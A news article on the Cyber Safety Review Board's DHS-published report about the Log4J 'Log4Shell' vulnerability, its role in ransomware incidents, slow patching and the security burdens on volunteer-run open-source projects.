The Department of Homeland Security published a report recently that detailed what the agency refers to as an "endemic vulnerability" in a piece of software used by governments and businesses worldwide.
While released by the DHS, the report is the work of the Cyber Safety Review Board, a government forum set up through an executive order President Joe Biden authorized in February. The board was created in response to the explosion of cybercrime over the last few years, particularly ransomware. The notorious malware has plagued consumers worldwide, threatened IT databases at hospitals and schools, and struck companies from the Colonial Pipeline Company to the Ferrara Candy Company.
"At this critical juncture in our nation's cybersecurity, when our ability to handle risk is not keeping pace with advances in the digital space, the Cyber Safety Review Board is a new and transformational institution that will advance our cyber resilience in unprecedented ways," said Secretary of Homeland Security Alejandro N. Mayorkas. "The CSRB's first-of-its-kind review has provided us - government and industry alike - with clear, actionable recommendations that DHS will help implement to strengthen our cyber resilience and advance the public-private partnership that is so vital to our collective security."
According to the CSRB's report, a number of ransomware cases likely occurred as the result of a critical vulnerability in Log4J, a piece of open-source software created by the Apache Software Foundation. Log4J is what is known as "logging" software; its purpose is to document events (usually in a text file) that take place within a computer's OS, or whenever a program is run.
The flaw in the program (named "Log4Shell" by LunaSec), which some experts have claimed is the most severe digital security vulnerability to date, gave the ability to hackers to pull of what is known as "arbitrary code execution." In essence, hackers are easily able to exploit gaps in Log4J's code to inject and run their own malicious code.
While the CSRB has provided a length list of recommendations and intends to work with industry experts at addressing issues to U.S. cybersecurity, the board has warned that the vulnerability could affect countless devices already, and that rectifying the vulnerability could take years. According to an analysis conducted by Ernst & Young and cloud security company Wiz, 93% of enterprise cloud platforms were vulnerable to the flaw shortly after it was disclosed by the Apache Software Foundation last year. The CSRB's report notes that "many organizations have still not fully patched vulnerable instances of Log4j."
The report outlined crucial faults with the nature of open-source software use in U.S. industries, highlighting the over-reliance on well-established firms as the Apache Software Foundation. The report notes that, unlike conventional enterprises, the ASF and other open-source groups do not keep track of who uses their products, nor do they try to manage access.
"The Board also found specific challenges associated with maintaining open-source projects like Log4j, which generally rely on volunteer teams and do not necessarily have dedicated security resources throughout the Software Development Lifecycle," the CSRB notes in its report. "Open-source projects generally do not have dedicated coordinated vulnerability disclosure and response teams that investigate root causes of reported vulnerabilities and work to bring them to resolution."